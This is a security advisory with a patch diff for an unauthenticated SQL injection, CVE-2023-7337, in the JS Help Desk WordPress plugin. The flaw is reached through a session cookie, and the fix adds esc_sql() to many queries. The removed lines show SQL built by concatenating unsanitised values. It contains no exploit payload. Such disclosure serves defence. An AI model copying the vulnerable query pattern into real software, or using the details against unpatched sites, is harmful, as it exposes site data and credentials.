Atomic Edge analysis of CVE-2023-7337:
The vulnerability is an unauthenticated SQL injection in the JS Help Desk WordPress plugin version 2.8.2. The root cause is insufficient input sanitization on the ‘js-support-ticket-token-tkstatus’ cookie value when used in SQL queries. This cookie is processed by the plugin’s session handling mechanism. The plugin’s wphdnotification.php file contains the getNotificationDatabySessionId function at line 81, which directly concatenates the user-controlled session ID from the cookie into an SQL query without proper escaping. The query uses the jssupportticket::$_jshdsession->sessionid variable, which is populated from the ‘js-support-ticket-token-tkstatus’ cookie. Attackers can manipulate this cookie to inject malicious SQL payloads. The patch adds esc_sql() sanitization to the sessionid parameter in the query at line 81 of wphdnotification.php, ensuring proper escaping before database execution. This vulnerability allows unauthenticated attackers to execute arbitrary SQL commands, potentially extracting sensitive data like user credentials, ticket contents, and system configuration. The CVSS score of 7.5 reflects high impact with no authentication required.
Published : March 18, 2026
CVE-2023-7337: JS Help Desk – AI-Powered Support & Ticketing System 2.8.2 – Unauthenticated SQL Injection via ‘js-support-ticket-token-tkstatus’ Cookie (js-support-ticket)
CVE ID
CVE-2023-7337
Plugin
js-support-ticket
Severity
High
(CVSS 7.5)
CWE
89
Vulnerable Version
2.8.2
Patched Version
2.8.3
Disclosed
March 2, 2026
Analysis Overview
Differential between vulnerable and patched code
Code Diff
--- a/js-support-ticket/includes/activation.php
+++ b/js-support-ticket/includes/activation.php
@@ -97,9 +97,9 @@
('new_ticket_mail_to_admin', '1', 'default', ''),
('new_ticket_mail_to_staff_members', '0', 'default', 'agent'),
('banemail_mail_to_admin', '0', 'default', 'banemail'),
- ('ticket_reassign_admin', '1', 'default', NULL),
+ ('ticket_reassign_admin', '1', 'default', 'agent'),
('ticket_reassign_staff', '0', 'default', 'agent'),
- ('ticket_reassign_user', '1', 'default', NULL),
+ ('ticket_reassign_user', '1', 'default', 'agent'),
('ticket_close_admin', '1', 'default', NULL),
('ticket_close_staff', '0', 'default', 'agent'),
('ticket_close_user', '1', 'default', NULL),
@@ -112,9 +112,9 @@
('ticket_ban_email_admin', '0', 'default', 'banemail'),
('ticket_ban_email_staff', '0', 'default', 'banemail'),
('ticket_ban_email_user', '0', 'default', 'banemail'),
- ('ticket_department_transfer_admin', '1', 'default', NULL),
- ('ticket_department_transfer_staff', '0', 'default', 'agent'),
- ('ticket_department_transfer_user', '1', 'default', NULL),
+ ('ticket_department_transfer_admin', '1', 'default', 'actions'),
+ ('ticket_department_transfer_staff', '0', 'default', 'actions'),
+ ('ticket_department_transfer_user', '1', 'default', 'actions'),
('ticket_reply_ticket_user_admin', '1', 'default', NULL),
('ticket_reply_ticket_user_staff', '0', 'default', 'agent'),
('ticket_reply_ticket_user_user', '1', 'default', NULL),
@@ -194,8 +194,8 @@
('tplink_faqs_user', '0', 'tplink', 'faq'),
('show_breadcrumbs', '1', 'default', NULL),
('productcode', 'jsticket', 'default', NULL),
- ('versioncode', '2.8.2', 'default', NULL),
- ('productversion', '282', 'default', NULL),
+ ('versioncode', '2.8.3', 'default', NULL),
+ ('productversion', '283', 'default', NULL),
('producttype', 'free', 'default', NULL),
('tve_enabled', '2', 'default', NULL),
('tve_mailreadtype', '3', 'default', NULL),
@@ -225,7 +225,7 @@
('prefix_ticketid', '', 'customticketid', NULL),
('suffix_ticketid', '', 'customticketid', NULL),
('padding_zeros_ticketid', '', 'customticketid', NULL),
- ('print_ticket_user', '1', 'ticket', NULL),
+ ('print_ticket_user', '1', 'ticket', 'actions'),
('last_version', '211', 'default', NULL),
('cplink_staff_report_staff', '2', 'cplink', 'agent'),
('cplink_department_report_staff', '2', 'cplink', 'agent'),
@@ -242,7 +242,7 @@
('show_email_on_ticket_reply', '1', 'ticket', NULL),
('show_ticket_delete_button', '1', 'ticket', NULL),
('visitor_message', 'Thank You for contacting us. A support ticket request has been created, A representative will be getting back to you shortly.rnSupport Team', 'default', NULL),
- ('ticket_reply_closed_ticket_user', '1', 'default', NULL),
+ ('ticket_reply_closed_ticket_user', '1', 'default', 'emailpiping'),
('feedback_thanks_message', 'Thank you for providing your feedback. We appreciate the time you have taken and will actively use it to improve our services to you.', 'default', 'feedback'),
('serialnumber', '67259', 'hostdata', NULL),
('hostdata', '88fd93f82e5ca231ff4e85e769be370f', 'hostdata', NULL),
--- a/js-support-ticket/includes/classes/customfields.php
+++ b/js-support-ticket/includes/classes/customfields.php
@@ -506,7 +506,7 @@
if (!is_admin()) {
$inquery .= ' AND userfieldtype != "admin_only" ';
}
- $query = "SELECT field,fieldtitle,isuserfield,userfieldtype,userfieldparams,multiformid FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE isuserfield = 1 AND " . $published . " AND fieldfor =" . $fieldfor . $inquery. " AND multiformid =" . $multiformid. " ORDER BY ordering";
+ $query = "SELECT field,fieldtitle,isuserfield,userfieldtype,userfieldparams,multiformid FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE isuserfield = 1 AND " . $published . " AND fieldfor =" . esc_sql($fieldfor) . $inquery. " AND multiformid =" . esc_sql($multiformid). " ORDER BY ordering";
$data = jssupportticket::$_db->get_results($query);
return $data;
}
@@ -521,7 +521,7 @@
$inquery .= " AND userfieldtype != 'admin_only'";
}
- $query = "SELECT `rows`,`cols`,required,field,fieldtitle,isuserfield,userfieldtype,userfieldparams,depandant_field FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE isuserfield = 1 AND " . $inquery . " AND fieldfor =" . $fieldfor ." ORDER BY ordering ";
+ $query = "SELECT `rows`,`cols`,required,field,fieldtitle,isuserfield,userfieldtype,userfieldparams,depandant_field FROM " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE isuserfield = 1 AND " . $inquery . " AND fieldfor =" . esc_sql($fieldfor) ." ORDER BY ordering ";
$data = jssupportticket::$_db->get_results($query);
return $data;
}
@@ -534,7 +534,7 @@
}
$value = '';
$returnarray = array();
- $query = "SELECT field from " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE isuserfield = 1 AND " . $published . " AND depandant_field ='" . $fieldfor . "'";
+ $query = "SELECT field from " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE isuserfield = 1 AND " . $published . " AND depandant_field ='" . esc_sql($fieldfor) . "'";
$field = jssupportticket::$_db->get_var($query);
if ($data != null) {
foreach ($data as $key => $val) {
@@ -544,7 +544,7 @@
}
}
}
- $query = "SELECT userfieldparams from " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE isuserfield = 1 AND " . $published . " AND field ='" . $fieldfor . "'";
+ $query = "SELECT userfieldparams from " . jssupportticket::$_db->prefix . "js_ticket_fieldsordering WHERE isuserfield = 1 AND " . $published . " AND field ='" . esc_sql($fieldfor) . "'";
$field = jssupportticket::$_db->get_var($query);
$fieldarray = json_decode($field);
foreach ($fieldarray as $key => $val) {
--- a/js-support-ticket/includes/classes/jsstadminsidemenu.php
+++ b/js-support-ticket/includes/classes/jsstadminsidemenu.php
@@ -312,7 +312,7 @@
<span class="jsst_text"><?php echo esc_html(__('GDPR','js-support-ticket')); ?></span>
</a>
<ul class="jsstadmin-sidebar-submenu treeview-menu">
- <li class="<?php if($c == 'gdpr' && ($layout == 'gdprfields') || ($layout == 'addgdprfield')) echo 'active'; ?>">
+ <li style="display: none;" class="<?php if($c == 'gdpr' && ($layout == 'gdprfields') || ($layout == 'addgdprfield')) echo 'active'; ?>">
<a href="?page=gdpr&jstlay=gdprfields" title="<?php echo esc_html(__('GDPR Fields','js-support-ticket')); ?>">
<?php echo esc_html(__('GDPR Fields','js-support-ticket')); ?>
</a>
--- a/js-support-ticket/includes/classes/uploads.php
+++ b/js-support-ticket/includes/classes/uploads.php
@@ -22,7 +22,7 @@
if($this->uploadfor == 'ticket'){
$path = $path . '/ticket';
- $query = "SELECT attachmentdir FROM `".jssupportticket::$_db->prefix."js_ticket_tickets` WHERE id = ".$this->ticketid;
+ $query = "SELECT attachmentdir FROM `".jssupportticket::$_db->prefix."js_ticket_tickets` WHERE id = ".esc_sql($this->ticketid);
$foldername = jssupportticket::$_db->get_var($query);
}elseif($this->uploadfor == 'article'){
$path = $path . '/articles/article_'.$this->articleid;
@@ -131,7 +131,7 @@
if (!file_exists($path)) { // create user directory
JSSTincluder::getJSModel('jssupportticket')->makeDir($path);
}
- $query = "SELECT attachmentdir FROM `".jssupportticket::$_db->prefix."js_ticket_tickets` WHERE id = ".$idsarray[0];
+ $query = "SELECT attachmentdir FROM `".jssupportticket::$_db->prefix."js_ticket_tickets` WHERE id = ".esc_sql($idsarray[0]);
$foldername = jssupportticket::$_db->get_var($query);
$path = $path . '/' . $foldername;
--- a/js-support-ticket/includes/classes/user.php
+++ b/js-support-ticket/includes/classes/user.php
@@ -15,7 +15,7 @@
$wpuserid = get_current_user_id();
if (!is_numeric($wpuserid))
return false;
- $query = "SELECT * FROM `".jssupportticket::$_db->prefix."js_ticket_users` WHERE wpuid = " . $wpuserid;
+ $query = "SELECT * FROM `".jssupportticket::$_db->prefix."js_ticket_users` WHERE wpuid = " . esc_sql($wpuserid);
$currentuser = jssupportticket::$_db->get_row($query);
$jssupportticket_registerform = JSSTrequest::getVar('jsst_support_register_nonce', 'post', '');
$registerform = JSSTrequest::getVar('jssupportticket_registerform', 'post', 0);
@@ -61,7 +61,7 @@
$row->store();
if (is_numeric($row->id)) {
- $query = "SELECT * FROM `".jssupportticket::$_db->prefix."js_ticket_users` WHERE id = " . $row->id;
+ $query = "SELECT * FROM `".jssupportticket::$_db->prefix."js_ticket_users` WHERE id = " . esc_sql($row->id);
$currentuser = jssupportticket::$_db->get_results($query);
}
}
@@ -148,7 +148,7 @@
$wpuserid = JSSTincluder::getObjectClass('user')->uid();
if (!is_numeric($wpuserid))
return false;
- $query = "SELECT COUNT(id) FROM `".jssupportticket::$_db->prefix."js_ticket_users` WHERE wpuid = " . $wpuserid;
+ $query = "SELECT COUNT(id) FROM `".jssupportticket::$_db->prefix."js_ticket_users` WHERE wpuid = " . esc_sql($wpuserid);
$result = jssupportticket::$_db->get_results($query);
if ($result > 0) {
return true;
@@ -180,7 +180,7 @@
function getjssupportticketuidbyuserid($userid)
{
if (!is_numeric($userid)) return false;
- $query = "SELECT id FROM `".jssupportticket::$_db->prefix."js_ticket_users` WHERE wpuid = " . $userid;
+ $query = "SELECT id FROM `".jssupportticket::$_db->prefix."js_ticket_users` WHERE wpuid = " . esc_sql($userid);
$uid = jssupportticket::$_db->get_results($query);
return $uid;
}
@@ -193,7 +193,7 @@
if(! is_numeric($uid))
return false;
$model = JSSTincluder::getJSModel('ticket');
- $query = "SELECT id , ticketid FROM `".jssupportticket::$_db->prefix."js_ticket_tickets` WHERE wpuid = ".$uid;
+ $query = "SELECT id , ticketid FROM `".jssupportticket::$_db->prefix."js_ticket_tickets` WHERE wpuid = ".esc_sql($uid);
$tickets = jssupportticket::$_db->get_results($query);
do_action('jsst_addon_deletequery_for_user');
@@ -206,10 +206,10 @@
LEFT JOIN `". jssupportticket::$_db->prefix ."js_ticket_erasedatarequests` AS erasedatarequests ON erasedatarequests.uid = user.id
"
. jssupportticket::$_addon_query['join'] . "
- WHERE user.id = " . $uid;
+ WHERE user.id = " . esc_sql($uid);
jssupportticket::$_db->query($query);
do_action('reset_jsst_aadon_query');
- $query = "DELETE user FROM `".jssupportticket::$_db->prefix."js_ticket_users` AS user WHERE wpuid = " . $uid;
+ $query = "DELETE user FROM `".jssupportticket::$_db->prefix."js_ticket_users` AS user WHERE wpuid = " . esc_sql($uid);
if(jssupportticket::$_db->query($query)){
$maindir = wp_upload_dir();
$basedir = $maindir['basedir'];
@@ -236,10 +236,19 @@
if (!is_numeric($wpuid))
return false;
- $query = "SELECT id FROM `".jssupportticket::$_db->prefix."js_ticket_users` WHERE wpuid = " . $wpuid;
+ $query = "SELECT id FROM `".jssupportticket::$_db->prefix."js_ticket_users` WHERE wpuid = " . esc_sql($wpuid);
$result = jssupportticket::$_db->get_var($query);
return $result;
}
+ function getUserNameByUid($uid) {
+ if (!is_numeric($uid))
+ return false;
+
+ $query = "SELECT display_name,user_nicename FROM `".jssupportticket::$_db->prefix."js_ticket_users` WHERE id = " . $uid;
+ $result = jssupportticket::$_db->get_row($query);
+ return $result;
+ }
+
}
--- a/js-support-ticket/includes/classes/wphdnotification.php
+++ b/js-support-ticket/includes/classes/wphdnotification.php
@@ -81,7 +81,7 @@
public function getNotificationDatabySessionId($sessionfor , $deldata = false){
if(jssupportticket::$_jshdsession->sessionid == '')
return false;
- $query = "SELECT sessionmsg FROM `" . jssupportticket::$_db->prefix . "js_ticket_jshdsessiondata` WHERE usersessionid = '" . jssupportticket::$_jshdsession->sessionid . "' AND sessionfor = '" . $sessionfor . "' AND sessionexpire > '" . time() . "'";
+ $query = "SELECT sessionmsg FROM `" . jssupportticket::$_db->prefix . "js_ticket_jshdsessiondata` WHERE usersessionid = '" . esc_sql(jssupportticket::$_jshdsession->sessionid) . "' AND sessionfor = '" . esc_sql($sessionfor) . "' AND sessionexpire > '" . time() . "'";
$data = jssupportticket::$_db->get_var($query);
if(!empty($data)){
$data = jssupportticketphplib::JSST_safe_decoding($data);
--- a/js-support-ticket/includes/deactivation.php
+++ b/js-support-ticket/includes/deactivation.php
@@ -11,7 +11,7 @@
$timestamp = wp_next_scheduled( 'jsst_delete_expire_session_data' );
wp_unschedule_event( $timestamp, 'jsst_delete_expire_session_data' );
$id = jssupportticket::getPageid();
- jssupportticket::$_db->get_var("UPDATE `" . jssupportticket::$_db->prefix . "posts` SET post_status = 'draft' WHERE ID = $id");
+ jssupportticket::$_db->get_var("UPDATE `" . jssupportticket::$_db->prefix . "posts` SET post_status = 'draft' WHERE ID = ".esc_sql($id));
//Delete capabilities
$role = get_role( 'administrator' );
--- a/js-support-ticket/includes/jsst-hooks.php
+++ b/js-support-ticket/includes/jsst-hooks.php
@@ -262,7 +262,7 @@
function jsst_update_user_profile($user_id)
{
- $query = "SELECT * FROM `" . jssupportticket::$_db->prefix . "users` WHERE id = " . $user_id;
+ $query = "SELECT * FROM `" . jssupportticket::$_db->prefix . "users` WHERE id = " . esc_sql($user_id);
$user = jssupportticket::$_db->get_row($query);
$uid = "";
@@ -274,7 +274,7 @@
if(isset($_POST['user_id'])) $post_user_id = jssupportticket::JSST_sanitizeData($_POST['user_id']); // JSST_sanitizeData() function uses wordpress santize functions
if ($post_user_id == $user_id) {
- $query = "SELECT id FROM `" . jssupportticket::$_db->prefix . "js_ticket_users` WHERE wpuid = " . $user_id;
+ $query = "SELECT id FROM `" . jssupportticket::$_db->prefix . "js_ticket_users` WHERE wpuid = " . esc_sql($user_id);
$id = jssupportticket::$_db->get_var($query);
}
$name = "";
--- a/js-support-ticket/includes/permissions.php
+++ b/js-support-ticket/includes/permissions.php
@@ -9,7 +9,7 @@
$query = "SELECT perm_allowed.status
FROM `" . jsjobs::$_db->prefix . "jsjobs_permissions` AS perm
JOIN `" . jsjobs::$_db->prefix . "jsjobs_permissions_allowed` AS perm_allowed ON perm_allowed.permissionid = perm.id
- WHERE perm.permissions = '$permissionfor' AND perm_allowed.userid = $userid";
+ WHERE perm.permissions = '".esc_sql($permissionfor)."' AND perm_allowed.userid = ".esc_sql($userid);
$result = jsjobs::$_db->get_var($query);
return $result;
}
--- a/js-support-ticket/includes/tables/table.php
+++ b/js-support-ticket/includes/tables/table.php
@@ -111,7 +111,7 @@
function load($id){
if(!is_numeric($id)) return false;
- $query = "SELECT * FROM `".$this->tablename."` WHERE ".$this->primarykey." = ".$id;
+ $query = "SELECT * FROM `".$this->tablename."` WHERE ".$this->primarykey." = ".esc_sql($id);
$result = jssupportticket::$_db->get_row($query);
$array = get_object_vars($this);
unset($array['isnew']);
@@ -129,4 +129,4 @@
}
-?>
No newline at end of file
+?>
--- a/js-support-ticket/includes/updates/updates.php
+++ b/js-support-ticket/includes/updates/updates.php
@@ -19,7 +19,7 @@
$query = "SELECT configvalue FROM `".jssupportticket::$_db->prefix."js_ticket_config` WHERE configname='versioncode'";
$versioncode = jssupportticket::$_db->get_var($query);
$versioncode = jssupportticketphplib::JSST_str_replace('.','',$versioncode);
- $query = "UPDATE `".jssupportticket::$_db->prefix."js_ticket_config` SET configvalue = '".$versioncode."' WHERE configname = 'last_version';";
+ $query = "UPDATE `".jssupportticket::$_db->prefix."js_ticket_config` SET configvalue = '".esc_sql($versioncode)."' WHERE configname = 'last_version';";
jssupportticket::$_db->query($query);
$from = $installedversion + 1;
$to = $cversion;
--- a/js-support-ticket/js-support-ticket.php
+++ b/js-support-ticket/js-support-ticket.php
@@ -3,14 +3,14 @@
/**
* @package JS Help Desk
* @author Ahmad Bilal
- * @version 2.8.2
+ * @version 2.8.3
*/
/*
Plugin Name: JS Help Desk
Plugin URI: https://www.jshelpdesk.com
Description: JS Help Desk is a trusted open source ticket system. JS Help Desk is a simple, easy to use, web-based customer support system. User can create ticket from front-end. JS Help Desk comes packed with lot features than most of the expensive(and complex) support ticket system on market. JS Help Desk provide you best industry help desk system.
Author: JS Help Desk
- Version: 2.8.2
+ Version: 2.8.3
Text Domain: js-support-ticket
Author URI: https://www.jshelpdesk.com
*/
@@ -66,7 +66,7 @@
self::$_data = array();
self::$_search = array();
self::$_captcha = array();
- self::$_currentversion = '282';
+ self::$_currentversion = '283';
self::$_addon_query = array('select'=>'','join'=>'','where'=>'');
self::$_jshdsession = JSSTincluder::getObjectClass('wphdsession');
global $wpdb;
@@ -144,7 +144,7 @@
// restore colors data end
update_option('jsst_currentversion', self::$_currentversion);
include_once JSST_PLUGIN_PATH . 'includes/updates/updates.php';
- JSSTupdates::checkUpdates('282');
+ JSSTupdates::checkUpdates('283');
JSSTincluder::getJSModel('jssupportticket')->updateColorFile();
}
}
--- a/js-support-ticket/modules/attachment/model.php
+++ b/js-support-ticket/modules/attachment/model.php
@@ -10,7 +10,7 @@
return false;
$query = "SELECT filename,filesize,id
FROM `" . jssupportticket::$_db->prefix . "js_ticket_attachments`
- WHERE ticketid = " . $id . " and replyattachmentid = 0";
+ WHERE ticketid = " . esc_sql($id) . " and replyattachmentid = 0";
jssupportticket::$_data[5] = jssupportticket::$_db->get_results($query);
if (jssupportticket::$_db->last_error != null) {
JSSTincluder::getJSModel('systemerror')->addSystemError();
@@ -25,7 +25,7 @@
return false;
$query = "SELECT filename,filesize,id
FROM `" . jssupportticket::$_db->prefix . "js_ticket_attachments`
- WHERE ticketid = " . $id . " AND replyattachmentid = " . $replyattachmentid;
+ WHERE ticketid = " . esc_sql($id) . " AND replyattachmentid = " . esc_sql($replyattachmentid);
$result = jssupportticket::$_db->get_results($query);
if (jssupportticket::$_db->last_error != null) {
JSSTincluder::getJSModel('systemerror')->addSystemError();
@@ -74,7 +74,7 @@
$query = $query = "SELECT ticket.attachmentdir AS foldername,ticket.id AS ticketid,attach.filename "
. " FROM `".jssupportticket::$_db->prefix."js_ticket_attachments` AS attach "
. " JOIN `".jssupportticket::$_db->prefix."js_ticket_tickets` AS ticket ON ticket.id = attach.ticketid "
- . " WHERE attach.id = $id";
+ . " WHERE attach.id = ". esc_sql($id);
$obj = jssupportticket::$_db->get_row($query);
$filename = $obj->filename;
$foldername = $obj->foldername;
@@ -103,7 +103,7 @@
$query = "SELECT ticket.attachmentdir AS foldername,ticket.id AS ticketid,attach.filename "
. " FROM `".jssupportticket::$_db->prefix."js_ticket_attachments` AS attach "
. " JOIN `".jssupportticket::$_db->prefix."js_ticket_tickets` AS ticket ON ticket.id = attach.ticketid "
- . " WHERE attach.id = $id";
+ . " WHERE attach.id = ". esc_sql($id);
$object = jssupportticket::$_db->get_row($query);
$datadirectory = jssupportticket::$_config['data_directory'];
$foldername = $object->foldername;
@@ -124,7 +124,7 @@
$query = "SELECT ticket.attachmentdir AS foldername,ticket.id AS ticketid,attach.filename "
. " FROM `".jssupportticket::$_db->prefix."js_ticket_attachments` AS attach "
. " JOIN `".jssupportticket::$_db->prefix."js_ticket_tickets` AS ticket ON ticket.id = attach.ticketid "
- . " WHERE attach.id = $id";
+ . " WHERE attach.id = ". esc_sql($id);
$object = jssupportticket::$_db->get_row($query);
$foldername = $object->foldername;
$ticketid = $object->ticketid;
@@ -176,7 +176,7 @@
if(empty($file_name)) return false;
if(!is_numeric($id)) return false;
$filename = jssupportticketphplib::JSST_str_replace(' ', '_',$file_name);
- $query = "SELECT attachmentdir FROM `".jssupportticket::$_db->prefix."js_ticket_tickets` WHERE id = ".$id;
+ $query = "SELECT attachmentdir FROM `".jssupportticket::$_db->prefix."js_ticket_tickets` WHERE id = ".esc_sql($id);
$foldername = jssupportticket::$_db->get_var($query);
$datadirectory = jssupportticket::$_config['data_directory'];
--- a/js-support-ticket/modules/configuration/model.php
+++ b/js-support-ticket/modules/configuration/model.php
@@ -28,7 +28,7 @@
function getConfigurationByFor($for) {
if($for == 'ticketviaemail'){
- $query = "SELECT COUNT(configname) FROM `" . jssupportticket::$_db->prefix . "js_ticket_config` WHERE configfor = '".$for."'";
+ $query = "SELECT COUNT(configname) FROM `" . jssupportticket::$_db->prefix . "js_ticket_config` WHERE configfor = '".esc_sql($for)."'";
$count = jssupportticket::$_db->get_var($query);
if($count < 5){
$query = "SELECT configname,configvalue
@@ -47,7 +47,7 @@
}
}
$query = "SELECT configname,configvalue
- FROM `" . jssupportticket::$_db->prefix . "js_ticket_config` WHERE configfor = '".$for."'";
+ FROM `" . jssupportticket::$_db->prefix . "js_ticket_config` WHERE configfor = '".esc_sql($for)."'";
$data = jssupportticket::$_db->get_results($query);
if (jssupportticket::$_db->last_error != null) {
JSSTincluder::getJSModel('systemerror')->addSystemError();
@@ -63,10 +63,10 @@
function getCountByConfigFor($for) {
if (( in_array('agent',jssupportticket::$_active_addons) && JSSTincluder::getJSModel('agent')->isUserStaff())) {
$query = "SELECT COUNT(configvalue)
- FROM `" . jssupportticket::$_db->prefix . "js_ticket_config` WHERE configfor = '".$for. "' AND configname LIKE '%staff' AND configvalue = 1 " ;
+ FROM `" . jssupportticket::$_db->prefix . "js_ticket_config` WHERE configfor = '".esc_sql($for). "' AND configname LIKE '%staff' AND configvalue = 1 " ;
}else{
$query = "SELECT COUNT(configvalue)
- FROM `" . jssupportticket::$_db->prefix . "js_ticket_config` WHERE configfor = '".$for. "' AND configname LIKE '%user' AND configvalue = 1 " ;
+ FROM `" . jssupportticket::$_db->prefix . "js_ticket_config` WHERE configfor = '".esc_sql($for) . "' AND configname LIKE '%user' AND configvalue = 1 " ;
}
$data = jssupportticket::$_db->get_var($query);
if (jssupportticket::$_db->last_error != null) {
@@ -76,7 +76,7 @@
}
function storeDesktopNotificationLogo($filename) {
- jssupportticket::$_db->query("UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_config` SET configvalue = '" . $filename . "' WHERE configname = 'logo_for_desktop_notfication_url' ");
+ jssupportticket::$_db->query("UPDATE `" . jssupportticket::$_db->prefix . "js_ticket_config` SET configvalue = '" . esc_sql($filename) . "' WHERE configname = 'logo_for_desktop_notfication_url' ");
}
function deleteDesktopNotificationsLogo() {
@@ -147,7 +147,7 @@
continue;
}
$value = jssupportticketphplib::JSST_str_replace(' ', '-', $value);
- $query = 'SELECT COUNT(ID) FROM `'.jssupportticket::$_db->prefix.'posts` WHERE post_name = "'.$value.'"';
+ $query = 'SELECT COUNT(ID) FROM `'.jssupportticket::$_db->prefix.'posts` WHERE post_name = "'.esc_sql($value).'"';
$countslug = jssupportticket::$_db->get_var($query);
if($countslug >= 1){
JSSTmessage::setMessage(esc_html(__('System slug is conflicted with post or page slug.', 'js-support-ticket')), 'error');
@@ -316,7 +316,7 @@
function genearateCronKey() {
$key = jssupportticketphplib::JSST_md5(date('Y-m-d'));
- $query = "UPDATE `".jssupportticket::$_db->prefix."js_ticket_config` SET configvalue = '".$key."' WHERE configname = 'ck'" ;
+ $query = "UPDATE `".jssupportticket::$_db->prefix."js_ticket_config` SET configvalue = '".esc_sql($key)."' WHERE configname = 'ck'" ;
jssupportticket::$_db->query($query);
return true;
}
@@ -332,7 +332,7 @@
}
function getConfigValue($configname){
- $query = "SELECT configvalue FROM `".jssupportticket::$_db->prefix."js_ticket_config` WHERE configname = '".$configname."'";
+ $query = "SELECT configvalue FROM `".jssupportticket::$_db->prefix."js_ticket_config` WHERE configname = '".esc_sql($configname)."'";
$configvalue = jssupportticket::$_db->get_var($query);
return $configvalue;
}
@@ -365,7 +365,7 @@
function getConfigurationByConfigName($configname) {
$query = "SELECT configvalue
- FROM `".jssupportticket::$_db->prefix."js_ticket_config` WHERE configname ='" . $configname . "'";
+ FROM `".jssupportticket::$_db->prefix."js_ticket_config` WHERE configname ='" . esc_sql($configname) . "'";
$result = jssupportticket::$_db->get_var($query);
return $result;
}
--- a/js-support-ticket/modules/configuration/tpls/admin_configurations.php
+++ b/js-support-ticket/modules/configuration/tpls/admin_configurations.php
@@ -826,7 +826,7 @@
JSST_printConfigFieldSingle($title, $field, $description, $video, '', $videotext);
}
- if(isset(jssupportticket::$_data[0]['reopen_ticket_within_days'])){
+ if(isset(jssupportticket::$_data[0]['reopen_ticket_within_days'])){
$title = esc_html(__('Reopen ticket within days', 'js-support-ticket'));
$field = JSSTformfield::text('reopen_ticket_within_days', jssupportticket::$_data[0]['reopen_ticket_within_days'], array('class' => 'inputbox'));
$description = esc_html(__('The ticket can be reopened within a given number of days', 'js-support-ticket'));
--- a/js-support-ticket/modules/department/model.php
+++ b/js-support-ticket/modules/department/model.php
@@ -16,7 +16,7 @@
$departmentname = jssupportticket::parseSpaces($departmentname);
$inquery = '';
if ($departmentname != null)
- $inquery .= " WHERE department.departmentname LIKE '%".$departmentname."%'";
+ $inquery .= " WHERE department.departmentname LIKE '%".esc_sql($departmentname)."%'";
jssupportticket::$_data['filter'][$deptname] = $departmentname;
jssupportticket::$_data['filter']['pagesize'] = $pagesize;
@@ -51,7 +51,7 @@
$query = "SELECT department.*,email.email AS outgoingemail
FROM `" . jssupportticket::$_db->prefix . "js_ticket_departments` AS department
JOIN `" . jssupportticket::$_db->prefix . "js_ticket_email` AS email ON email.id = department.emailid
- WHERE department.id = " . $id;
+ WHERE department.id = " . esc_sql($id);
jssupportticket::$_data[0] = jssupportticket::$_db->get_row($query);
if (jssupportticket::$_db->last_error != null) {
JSSTincluder::getJSModel('systemerror')->addSystemError(); // if there is an error add it to system errorrs
@@ -87,7 +87,7 @@
$emailaddresses = array();
}
$query = "SELECT email FROM `" . jssupportticket::$_db->prefix . "js_ticket_email`
- WHERE id = ".$data['emailid'];
+ WHERE id = ".esc_sql($data['emailid']);
$email = jssupportticket::$_db->get_var($query);
foreach ($emailaddresses as $edata) {
@@ -154,7 +154,7 @@
$order = "<";
$direction = "DESC";
}
- $query = "SELECT t.ordering,t.id,t2.ordering AS ordering2 FROM `" . jssupportticket::$_db->prefix . "js_ticket_departments` AS t,`" . jssupportticket::$_db->prefix . "js_ticket_departments` AS t2 WHERE t.ordering $order t2.ordering AND t2.id = $id ORDER BY t.ordering $direction LIMIT 1";
+ $query = "SELECT t.ordering,t.id,t2.ordering AS ordering2 FROM `" . jssupportticket::$_db->prefix . "js_ticket_departments` AS t,`" . jssupportticket::$_db->prefix . "js_ticket_departments` AS t2 WHERE t.ordering $order t2.ordering AND t2.id = ".esc_sql($id)." ORDER BY t.ordering $direction LIMIT 1";
$result = jssupportticket::$_db->get_row($query);
$row = JSSTincluder::getJSTable('departments');
@@ -184,7 +184,7 @@
if(in_array('agent',jssupportticket::$_active_addons)){
$query = "DELETE
FROM `".jssupportticket::$_db->prefix . "js_ticket_acl_role_access_departments`
- WHERE departmentid = ".$id;
+ WHERE departmentid = ".esc_sql($id);
jssupportticket::$_db->query($query);
}
JSSTmessage::setMessage(esc_html(__('The department has been deleted', 'js-support-ticket')), 'updated');
@@ -202,19 +202,19 @@
if (!is_numeric($id))
return false;
$query = "SELECT (
- (SELECT COUNT(id) FROM `" . jssupportticket::$_db->prefix . "js_ticket_tickets` WHERE departmentid = " . $id . ")
- + (SELECT COUNT(id) FROM `" . jssupportticket::$_db->prefix . "js_ticket_departments` WHERE id = " . $id . " AND isdefault = 1) ";
+ (SELECT COUNT(id) FROM `" . jssupportticket::$_db->prefix . "js_ticket_tickets` WHERE departmentid = " . esc_sql($id) . ")
+ + (SELECT COUNT(id) FROM `" . jssupportticket::$_db->prefix . "js_ticket_departments` WHERE id = " . esc_sql($id) . " AND isdefault = 1) ";
if(in_array('agent', jssupportticket::$_active_addons)){
- $query .= " + (SELECT COUNT(id) FROM `" . jssupportticket::$_db->prefix . "js_ticket_acl_user_access_departments` WHERE departmentid = " . $id . ") ";
+ $query .= " + (SELECT COUNT(id) FROM `" . jssupportticket::$_db->prefix . "js_ticket_acl_user_access_departments` WHERE departmentid = " . esc_sql($id) . ") ";
}
if(in_array('helptopic', jssupportticket::$_active_addons)){
- $query .= " + (SELECT COUNT(id) FROM `" . jssupportticket::$_db->prefix . "js_ticket_help_topics` WHERE departmentid = " . $id . ") ";
+ $query .= " + (SELECT COUNT(id) FROM `" . jssupportticket::$_db->prefix . "js_ticket_help_topics` WHERE departmentid = " . esc_sql($id) . ") ";
}
if(in_array('cannedresponses', jssupportticket::$_active_addons)){
- $query .= " + (SELECT COUNT(id) FROM `" . jssupportticket::$_db->prefix . "js_ticket_department_message_premade` WHERE departmentid = " . $id . ")";
+ $query .= " + (SELECT COUNT(id) FROM `" . jssupportticket::$_db->prefix . "js_ticket_department_message_premade` WHERE departmentid = " . esc_sql($id) . ")";
}
$query .= " ) AS total";
@@ -244,7 +244,7 @@
function changeStatus($id) {
if (!is_numeric($id))
return false;
- $query = "SELECT status FROM `" . jssupportticket::$_db->prefix . "js_ticket_departments` WHERE id=" . $id;
